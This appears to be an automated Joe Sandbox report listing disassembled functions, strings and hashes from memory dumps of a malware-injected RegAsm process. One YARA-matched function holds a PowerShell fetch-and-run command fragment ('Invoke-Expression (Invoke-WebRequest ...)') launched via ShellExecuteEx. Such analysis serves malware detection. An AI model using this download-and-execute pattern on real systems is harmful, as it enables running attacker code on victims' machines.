                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: , c%d$config$content$docsize$id INTEGER PRIMARY KEY$id INTEGER PRIMARY KEY, sz BLOB$id INTEGER PRIMARY KEY, sz BLOB, origin INTEGER$k PRIMARY KEY, v$version
                                                                                                                                                                                                                                                              • API String ID: 0-3918257174
                                                                                                                                                                                                                                                              • Opcode ID: bf29fb18140a9957d4d1700f9e8fc6c8e8a12fdec19ec975085d1ed94cbc42cc
                                                                                                                                                                                                                                                              • Instruction ID: e4889c81059827b6ec985736a5244000d01a6270d2ee1312a0193de1d89654ca
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf29fb18140a9957d4d1700f9e8fc6c8e8a12fdec19ec975085d1ed94cbc42cc
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 995127718002129FC7129F28DD48B5B77ACEF84755F5D412DEC8997281D736EA0ACBE1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ATTACH x AS %Q$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                                                                              • API String ID: 0-2988319395
                                                                                                                                                                                                                                                              • Opcode ID: 77970a72825185d88ed83d2c1f92bd3a28e76b98827972269f1a4c9d323ce529
                                                                                                                                                                                                                                                              • Instruction ID: b5a1fb3608103bc56139f1541910ae4de5fbde80f3261cb44f41bb1fc423cb7d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 77970a72825185d88ed83d2c1f92bd3a28e76b98827972269f1a4c9d323ce529
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 92D1B0B09043819FD7108F38C885B5B77E8BF50756FC8452EE85A9A381E735E649CBE2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %c"%s"$("%s"$,arg HIDDEN$,schema HIDDEN$ABLE x$YHI;
                                                                                                                                                                                                                                                              • API String ID: 0-513083281
                                                                                                                                                                                                                                                              • Opcode ID: cdb16b992e26536a6d3a775144b99b087c2b24513b1cdfe1f3a9c39a524a2d7e
                                                                                                                                                                                                                                                              • Instruction ID: c266f785ac492ea8376f8bdf252fdfe56dd3aa76ee6b259b62e5afd683eabfce
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cdb16b992e26536a6d3a775144b99b087c2b24513b1cdfe1f3a9c39a524a2d7e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5271A4749083859FD314CF68C840B5ABBE0FF98304F488A5EF99A97241E775E64DCB92
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19904C2A
                                                                                                                                                                                                                                                              • API called with finalized prepared statement, xrefs: 19904C1E
                                                                                                                                                                                                                                                              • SELECT * FROM %Q.%Q, xrefs: 19904B25
                                                                                                                                                                                                                                                              • UNIQUE constraint failed: %s.%s, xrefs: 19904BC9
                                                                                                                                                                                                                                                              • misuse, xrefs: 19904C34
                                                                                                                                                                                                                                                              • %s at line %d of [%.10s], xrefs: 19904C39
                                                                                                                                                                                                                                                              • rtree constraint failed: %s.(%s<=%s), xrefs: 19904BF9
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$SELECT * FROM %Q.%Q$UNIQUE constraint failed: %s.%s$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$rtree constraint failed: %s.(%s<=%s)
                                                                                                                                                                                                                                                              • API String ID: 0-2013246442
                                                                                                                                                                                                                                                              • Opcode ID: fafacfb2bb8c560fcae9de1aa59737e53bf03808573831e5181b7e5e6c0a1e1b
                                                                                                                                                                                                                                                              • Instruction ID: 79748cd1be8e9fa673a3d6815cbd4d3df02276913c9f4ac1e81bf7b1991715d1
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fafacfb2bb8c560fcae9de1aa59737e53bf03808573831e5181b7e5e6c0a1e1b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 48412671900264AFE3018F799C94F9B33ACEF81A44F0C452CFC59D6281F722B959C6A2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %s%c%s$winFullPathname1$winFullPathname2
                                                                                                                                                                                                                                                              • API String ID: 0-2846052723
                                                                                                                                                                                                                                                              • Opcode ID: 7fc58046d9d6b74c0d2e55f6fdb28e9bfeb1f7913c6a38cb216729d7b8c55f0e
                                                                                                                                                                                                                                                              • Instruction ID: 19a3fd552bfa1d81002d3539d0db8015052defdd8357585af642cbbc318ebea2
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7fc58046d9d6b74c0d2e55f6fdb28e9bfeb1f7913c6a38cb216729d7b8c55f0e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5141AD669043402FE7225638FC85F6F3B9DAF81614F4C822DF8CB5D1C1E62BE846C262
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$bind on a busy prepared statement: [%s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                                                                              • API String ID: 0-3679126755
                                                                                                                                                                                                                                                              • Opcode ID: 08cdb3f28de88c1fc4055dcfb95a4d41124c35497f1b34e97088b467153cd42d
                                                                                                                                                                                                                                                              • Instruction ID: 6515367f6b64fadadf6ff05208ede40d797a81773fa8cdcdf35e608dfff06072
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 08cdb3f28de88c1fc4055dcfb95a4d41124c35497f1b34e97088b467153cd42d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C441FE70650600ABE710CB7CDC81FD672AABF80B05F4D442DF9999B2C1E77AE588D7A1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 00411819
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0041183A
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00411848
                                                                                                                                                                                                                                                                • Part of subcall function 0040F7A3: SHGetFolderPathA.SHELL32(00000000,O<B,00000000,00000000,?), ref: 0040F7D4
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 00411874
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?), ref: 00411892
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 004118A6
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?), ref: 004118B9
                                                                                                                                                                                                                                                                • Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314
                                                                                                                                                                                                                                                                • Part of subcall function 0040F75F: _EH_prolog.MSVCRT ref: 0040F764
                                                                                                                                                                                                                                                                • Part of subcall function 0040F75F: GetFileAttributesA.KERNEL32(00000000,?,0040D11E,?,?,?,?), ref: 0040F778
                                                                                                                                                                                                                                                                • Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D
                                                                                                                                                                                                                                                                • Part of subcall function 0040B8F5: _EH_prolog.MSVCRT ref: 0040B8FA
                                                                                                                                                                                                                                                                • Part of subcall function 0040B8F5: StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040B94D
                                                                                                                                                                                                                                                                • Part of subcall function 0040B8F5: memcmp.MSVCRT ref: 0040B98B
                                                                                                                                                                                                                                                                • Part of subcall function 00406138: _EH_prolog.MSVCRT ref: 0040613D
                                                                                                                                                                                                                                                                • Part of subcall function 00406138: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406160
                                                                                                                                                                                                                                                                • Part of subcall function 00406138: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406177
                                                                                                                                                                                                                                                                • Part of subcall function 00406138: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406193
                                                                                                                                                                                                                                                                • Part of subcall function 00406138: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 004061AD
                                                                                                                                                                                                                                                                • Part of subcall function 00406138: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 004061CE
                                                                                                                                                                                                                                                                • Part of subcall function 0040FA1A: GlobalAlloc.KERNEL32(00000000,00411947,?,00000000,?,00411947,?,?), ref: 0040FA25
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000), ref: 00411953
                                                                                                                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 00411A22
                                                                                                                                                                                                                                                                • Part of subcall function 004061EF: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058D6,00000000,00000000), ref: 0040620F
                                                                                                                                                                                                                                                                • Part of subcall function 004061EF: LocalAlloc.KERNEL32(00000040,004058D6,?,?,004058D6,00000000,?,?), ref: 0040621D
                                                                                                                                                                                                                                                                • Part of subcall function 004061EF: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058D6,00000000,00000000), ref: 00406233
                                                                                                                                                                                                                                                                • Part of subcall function 004061EF: LocalFree.KERNEL32(00000000,?,?,004058D6,00000000,?,?), ref: 00406242
                                                                                                                                                                                                                                                                • Part of subcall function 0040635E: _EH_prolog.MSVCRT ref: 00406363
                                                                                                                                                                                                                                                                • Part of subcall function 0040635E: memcmp.MSVCRT ref: 00406389
                                                                                                                                                                                                                                                                • Part of subcall function 0040635E: memset.MSVCRT ref: 004063B8
                                                                                                                                                                                                                                                                • Part of subcall function 0040635E: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,00000000), ref: 004063ED
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 004119C8
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00424477,?,?,?,?,000003E8), ref: 004119E5
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 004119FE
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,004247F4), ref: 00411A0C
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcat$H_prolog$AllocFileLocal$memset$BinaryCryptFreeGlobalStringmemcmp$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 174962345-0
                                                                                                                                                                                                                                                              • Opcode ID: bd521fdace08ffada53815f5a7f0b88e1755baff1bb916919acc6fc2ceb26861
                                                                                                                                                                                                                                                              • Instruction ID: 5ad5729dd416ef83487245d11710288c189482e0d5d9af95a652990cc7d88096
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bd521fdace08ffada53815f5a7f0b88e1755baff1bb916919acc6fc2ceb26861
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 28612AB2D01119ABCF10EBA1DC469EE7BBDEF08304F00047AF615B2151EA399A588BA5
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: content$docsize
                                                                                                                                                                                                                                                              • API String ID: 0-1024698521
                                                                                                                                                                                                                                                              • Opcode ID: 4790280ff5728b3fbc2df324ceecbd4e36321b7457150592bb50a0d26234d821
                                                                                                                                                                                                                                                              • Instruction ID: 3e518154c15e28bb3c5d6f2fed61d8718aab55a9c873c4d5def04e7836552e6e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4790280ff5728b3fbc2df324ceecbd4e36321b7457150592bb50a0d26234d821
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CCC1F171908312ABD313CF68C985B6B73E8AF80354F69452CFD8597290D372F985CB92
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 0041126D
                                                                                                                                                                                                                                                                • Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1
                                                                                                                                                                                                                                                                • Part of subcall function 0040F5DE: _EH_prolog.MSVCRT ref: 0040F5E3
                                                                                                                                                                                                                                                                • Part of subcall function 0040F5DE: GetSystemTime.KERNEL32(?,00424398,00000000,00000001,00000000,004244BE,004244B3,004244B2,00000000,00000000), ref: 0040F623
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A
                                                                                                                                                                                                                                                              • ShellExecuteEx.SHELL32(0000003C), ref: 0041163C
                                                                                                                                                                                                                                                                • Part of subcall function 004010D8: _EH_prolog.MSVCRT ref: 004010DD
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: H_prolog$lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                                                                                                                                                                                                                              • String ID: Invoke-Expression (Invoke-WebRequest -Uri "$" -UseBasicParsing).Content$"" $*.ps1$.ps1$<$C:\ProgramData\$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              • API String ID: 585178538-186952963
                                                                                                                                                                                                                                                              • Opcode ID: 1b010a9bdfb538d226b27d14283e0e96e20421f4c3b61436a55ea9dddb675daa
                                                                                                                                                                                                                                                              • Instruction ID: 52cafcdc57b90aa499f2c3c6c20a6af37ba43037423e94f5d444e485c31820c4
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1b010a9bdfb538d226b27d14283e0e96e20421f4c3b61436a55ea9dddb675daa
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 92D16E71C00288EADB05EBE2D956BDDBBB8AF14308F1444AEE505732C2DF781B19DB65
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
